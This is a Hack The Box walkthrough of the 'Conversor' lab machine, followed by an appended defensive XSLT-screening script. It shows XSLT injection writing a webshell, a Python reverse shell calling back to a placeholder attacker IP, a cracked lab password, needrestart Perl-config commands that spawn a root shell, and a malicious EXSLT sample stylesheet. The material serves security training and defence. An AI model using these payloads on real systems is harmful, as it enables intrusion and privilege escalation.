hackthebox Easy

Conversor

Overview

Conversor is a Linux box on Hack The Box at 10.10.11.92. The web application processes user-supplied XSLT files, enabling an attacker to write arbitrary files to the webroot. This leads to credential discovery via a SQLite database and SSH access. Privilege escalation abuses needrestart running as root via sudo with a crafted config file.

TL;DR

  • Foothold: XSLT injection to write a Python script under the webroot, exposing users.db with credentials fismathack:Keepmesafeandwarm
  • Privesc: sudo /usr/sbin/needrestart -c <crafted_config> spawns a root shell

Recon

Nmap Scan

nmap -p- -T4 10.10.11.92

Port  Service  Version
22    SSH      OpenSSH 8.9p1
80    HTTP     Apache/2.4.52

Add the virtual host:

echo "10.10.11.92 conversor.htb" | sudo tee -a /etc/hosts

Web App & XSLT Discovery

The web application processes user-supplied XSLT files. Using payloads from PayloadsAllTheThings XSLT Injection, we can read and write server files.

The XSLT payload uses extension elements (ptswarm:document or similar) to write Python files into /var/www/conversor.htb/scripts/.

Foothold

Writing a Webshell via XSLT

  1. Craft an XSLT payload that writes /var/www/conversor.htb/scripts/shell.py containing a reverse shell or command execution stub
  2. Upload the XSLT file through the vulnerable endpoint
  3. Confirm the file is accessible: http://conversor.htb/scripts/shell.py

Example reverse shell payload (replace placeholders):

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("[ATTACKER_IP]",[ATTACKER_PORT]))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
subprocess.call(["/bin/sh","-i"])

Credentials Discovery

The webroot contained a users.db SQLite database with an INSERT statement:

INSERT INTO users VALUES(1,'fismathack','5b5c3ac3a1c897c94caad48e6c71fdec');

Cracking the MD5 hash yields: fismathack:Keepmesafeandwarm

SSH Access

ssh fismathack@10.10.11.92
# password: Keepmesafeandwarm

User flag obtained from user.txt.

Privilege Escalation — needrestart

Checking sudo permissions:

sudo -l
# (root) NOPASSWD: /usr/sbin/needrestart

needrestart accepts a -c flag to specify a config file. The config file is parsed as Perl, allowing arbitrary code execution.

Variant A — system() directive

cat > /tmp/exploit.conf << 'EOF'
BEGIN { system("/bin/sh") }
[needrestart]
EOF

sudo /usr/sbin/needrestart -c /tmp/exploit.conf

Variant B — exec with preserved privileges

echo 'exec "/bin/sh","-p";' > /tmp/con.conf
sudo /usr/sbin/needrestart -c /tmp/con.conf

Both variants spawn a root shell. Read the flag:

cat /root/root.txt

Lessons Learned

  • XSLT processors should never allow extension elements that write to the filesystem
  • SQLite databases in the webroot are a common source of credential leaks
  • needrestart with sudo and arbitrary config file access is a known privesc vector — the config is parsed as Perl code
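A defender-side check for the first lesson and for the XSLT write primitive described under "Web App & XSLT Discovery": screening an uploaded stylesheet before it reaches the processor, refusing anything that declares extension elements or uses a file-writing XSL construct. This is an added example, not code from the box or the writeup; the allow-listed output namespaces, the sample stylesheets and the function names are assumptions made for the example.

```python
import xml.etree.ElementTree as ET

XSL_NS = "http://www.w3.org/1999/XSL/Transform"

# Namespaces a literal result element may use (constructed allow-list for this
# example: un-namespaced and XHTML output only). Anything else is refused.
ALLOWED_OUTPUT_NS = {"", "http://www.w3.org/1999/xhtml"}

# XSL elements that write a result tree to a path chosen by the stylesheet:
# xsl:document (XSLT 1.1 draft, implemented by libxslt) and xsl:result-document (XSLT 2.0).
XSL_WRITERS = {"document", "result-document"}


def _split(tag):
    """Split an ElementTree tag '{ns}local' into (ns, local)."""
    if tag.startswith("{"):
        ns, local = tag[1:].split("}", 1)
        return ns, local
    return "", tag


def screen_xslt(xslt_bytes):
    """Return the reasons to reject an uploaded stylesheet; an empty list means it passed."""
    root = ET.fromstring(xslt_bytes)
    ns, local = _split(root.tag)
    if ns != XSL_NS or local not in ("stylesheet", "transform"):
        return ["root element is not xsl:stylesheet"]
    findings = []
    # A stylesheet that asks the processor to enable extension elements is refused outright.
    if "extension-element-prefixes" in root.attrib:
        findings.append("declares extension-element-prefixes")
    for el in root.iter():
        ns, local = _split(el.tag)
        if ns == XSL_NS:
            if local in XSL_WRITERS:
                findings.append(f"xsl:{local} writes files")
        elif ns not in ALLOWED_OUTPUT_NS:
            # Foreign-namespace elements (exsl:document, redirect:write, msxsl:script, ...)
            findings.append(f"extension element {{{ns}}}{local}")
    return findings


# Constructed samples: a harmless transform and one using EXSLT to write a file.
BENIGN = b"""<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/"><html><body><xsl:value-of select="/doc/title"/></body></html></xsl:template>
</xsl:stylesheet>"""

MALICIOUS = b"""<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
 xmlns:exsl="http://exslt.org/common" extension-element-prefixes="exsl">
<xsl:template match="/"><exsl:document href="shell.py">print(1)</exsl:document></xsl:template>
</xsl:stylesheet>"""
```

The screen is a second line of defence, not a substitute for the processor's own controls: with lxml, for instance, passing an XSLTAccessControl with write_file and create_dir disabled to etree.XSLT denies the write inside the processor itself.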